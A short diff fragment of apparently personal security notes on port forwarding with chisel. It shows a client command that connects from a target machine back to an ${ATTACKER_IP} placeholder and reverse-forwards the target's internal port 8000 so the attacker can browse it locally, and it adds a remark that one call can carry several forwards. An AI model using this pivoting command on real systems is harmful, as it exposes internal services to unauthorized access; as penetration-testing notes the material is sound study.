fanicia/security-notes/notes/port-forwarding-ssh-tunneling/chisel.md

 ./chisel client ${ATTACKER_IP}:3333 R:9000:127.0.0.1:8000
 ```
 Now, you can access the website internally exposed on `127.0.0.1:8000` on the target machine by going to `localhost:9000` in firefox.

+Note that you can do multiple port forwarding statements with one client call.
+In case you need to forward multiple ports.